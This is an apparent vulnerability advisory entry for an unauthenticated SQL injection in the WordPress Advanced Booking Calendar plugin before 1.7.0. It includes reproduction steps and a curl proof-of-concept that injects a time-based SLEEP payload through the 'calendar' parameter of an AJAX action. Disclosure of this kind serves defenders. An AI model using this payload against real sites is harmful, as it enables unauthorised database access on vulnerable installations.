Lucene search

K
wpexploitCydaveWPEX-ID:990D1B0A-DBD1-42D0-9A40-C345407C6FE0
HistoryFeb 28, 2022 - 12:00 a.m.

Advanced Booking Calendar < 1.7.0 - Unauthenticated SQL Injection

2022-02-2800:00:00
cydave
87

EPSS

0.002

Percentile

52.0%

The plugin does not validate and escape the calendar parameter before using it in a SQL statement via the abc_booking_getSingleCalendar AJAX action (available to both unauthenticated and authenticated users), leading to an unauthenticated SQL injection

1. Install the vulnerable plugin (advanced-booking-calendar version 1.6.9)
2. Create a new calendar (the specific configuration shouldn't matter - we just need the shortcode)
3. Create a new page with the shortcode you receive when you finish creating a calendar
4. Visit the just created page and extract the nonce (search for abc_nonce in the source)
5. Invoke the following command to induce a 5 second sleep

curl -i http://example.com/wp-admin/admin-ajax.php --data 'action=abc_booking_getSingleCalendar&abc_nonce=7d55255d19&uniqid=620ff6dacd7f8&month=3&calendar=(SELECT 4061 FROM (SELECT(SLEEP(5)))GjRo)'

Note:
+ "abc_nonce" is the required nonce
+ "uniqid" can be a random string
+ "month" should be provided and be a valid int (a month in a year)
+ "calendar" is the injection point

EPSS

0.002

Percentile

52.0%

Related for WPEX-ID:990D1B0A-DBD1-42D0-9A40-C345407C6FE0